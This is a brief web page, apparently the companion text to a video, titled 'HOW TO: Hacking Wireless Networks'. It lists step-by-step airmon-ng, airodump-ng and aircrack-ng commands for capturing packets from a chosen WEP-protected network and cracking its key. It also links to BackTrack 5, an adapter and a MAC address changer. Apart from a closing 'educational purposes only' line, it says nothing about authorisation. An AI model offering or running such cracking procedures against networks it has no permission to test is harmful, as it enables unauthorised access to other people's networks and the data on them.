top of page

HOW TO: Hacking Wireless Networks


In this video I show you how to hack a wireless network that's encrypted with a WEP key. We will be using Windows 7 and Linux. This method works on Windows Vista and XP as well. Commands Used: 1. airmon-ng 2. airodump-ng wlan0 [This brings up a list of connections] 3. Press ctrl+c to stop finding connections 4. airodump-ng -w passcode --bssid "Enter the bssid of the connection you choose" -c [channel #] wlan0 [Open up another shell console] 5. dir 6. aircrack-ng -a 1 -b "Enter the bssid of the connection you chose" "Newest Passcode File.cap" [Press enter and the shell will find the password] Websites: VMWare Player: http://www.vmware.com/products/player/ Backtrack 5: http://iso.linuxquestions.org/backtra... Medialink Wireless LAN Adapter: http://www.amazon.com/Medialink-Wirel... Mac Address Changer http://technitium.com/tmac/ This video was made for educational purposes only

Recent Posts 
Serach By Tags
No tags yet.
bottom of page